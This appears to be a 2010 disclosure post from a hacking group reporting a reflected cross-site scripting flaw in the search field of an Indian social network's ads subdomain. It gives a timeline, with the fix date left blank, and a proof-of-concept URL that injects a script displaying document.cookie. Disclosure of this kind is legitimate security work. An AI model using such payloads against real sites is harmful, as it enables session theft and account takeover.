ibibo-xss.txt
Posted on 03 February 2010
Cross Site Scripting (XSS) Vulnerability in ibibo In search fields of cityads.ibibo.com ibibo.com is India’s first entertainment and talent based social network. It gives the youth of India a unique platform to showcase their talent, express themselves, create their own social network, audience and fan club and hence get recognition. Vulnerability Non-Persistent Cross site scripting (XSS) vulnerability is found in cityads.ibibo.com Disclosure Timeline Reported: Tue, Jan 19, 2010 at 5:23 PM Fixed: -------------- Credits H4CK3R Crew http://h4ck3r.in POC URL http://cityads.ibibo.com/search_result.php?cate_id=&q=%22%3E%3Cscript%3Ealert%28document.cookie%29%3C%2Fscript%3E&searchFrom=search_bar -- Rockey Killer It's all about Hacking and Security http://h4ck3r.in/
